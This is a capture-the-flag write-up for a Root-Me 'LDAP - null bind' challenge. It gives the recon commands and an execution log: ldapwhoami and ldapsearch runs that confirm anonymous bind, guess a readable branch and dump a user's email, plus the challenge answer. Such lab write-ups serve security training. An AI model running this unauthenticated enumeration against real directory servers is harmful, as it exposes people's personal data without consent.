* LDAP - null bind
** Notes
- https://repository.root-me.org/RFC/EN%20-%20rfc4512.txt
- https://stackoverflow.com/questions/18756688/what-are-cn-ou-dc-in-an-ldap-search
** Task
Aufgabe

Es scheint, dass einer der Anonymen einen neuen Zweig im LDAP-Verzeichnis erstellt hat, irgendwo in :
dc=challenge01,dc=root-me,dc=org

Verschaffen Sie sich Zugang zu seinen Daten und erhalten Sie seine E-Mail-Adresse.
Zugangsdaten für die Übung
Host	challenge01.root-me.org
Protokoll	TCP
Port	54013

** Findings
- Challenge type: LDAP anonymous/null bind enumeration.
- Base DN: dc=challenge01,dc=root-me,dc=org
- Target: find the branch created by an anonymous user and extract their email address.

** Useful tools
- ldapsearch (required)
- ldapwhoami (quick null-bind check)
- openssl s_client (optional, for TLS troubleshooting)

** Recon commands
#+begin_src bash
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(mail=*)"
#+end_src

** Execution log
- Verified anonymous bind:
  #+begin_src bash
  ldapwhoami -x -H ldap://challenge01.root-me.org:54013
  # anonymous
  #+end_src

- Direct subtree query on base DN is blocked:
  #+begin_src bash
  ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
  # result: 50 Insufficient access
  #+end_src

- Enumerated likely child DNs and found readable branch:
  #+begin_src bash
  ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
  # dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org
  #+end_src

- Dumped subtree under readable branch:
  #+begin_src bash
  ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
  # dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
  # mail: sabu@anonops.org
  #+end_src

** Flag / answer
- Email address: sabu@anonops.org